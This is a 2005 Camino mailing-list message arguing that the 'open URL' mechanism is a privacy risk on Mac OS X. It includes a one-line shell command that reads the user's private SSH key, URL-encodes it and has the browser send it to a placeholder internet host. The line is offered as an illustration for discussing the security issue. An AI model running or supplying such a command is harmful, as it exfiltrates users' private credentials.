On 07.03.2005, at 18:26, Simon Fraser wrote:
I'm not exactly sure what your concern is here. If it's possible to get personal data from you machine via a URL load (with or without a GET request) then that's a bug that should be filed and fixed. The fact that a URL load originated from an AppleEvent doesn't make any difference in terms of what it can do.
Simon
What I mean is this, here a quick and dirty example:
cat ~/.ssh/id_dsa | php -r 'while(!feof(STDIN)) $c .= fread(STDIN,256); echo "http://some.host.on.the.internet/?haha=".urlencode($c);' | xargs open
Of course, when this happens I must assume that the "malware" has already landed on my machine, and thus can act from there. So you are perfectly right in saying the problem should be "fixed earlier" (by downloading and installing only "trustworthy" software, and not opening suspicious mails, etc).
If anything still does land on my mac (for whatever reason, be it an unresolved bug in Mail, or anything), "open url" is an open door with no means for closing it (except by using extremely unconfortable tricks):
I'm not sure I'll be fast enough with a 'killall Camino' or Force Quit by the time my favorite fastest browser on Mac OS X has launched and opened the url.
Imho, in a world in which a cookie is a potential privacy threat, we should consider the open url feature also one.
:)
Lorenzo
_______________________________________________ Camino mailing list [email protected] http://mozdev.org/mailman/listinfo/camino
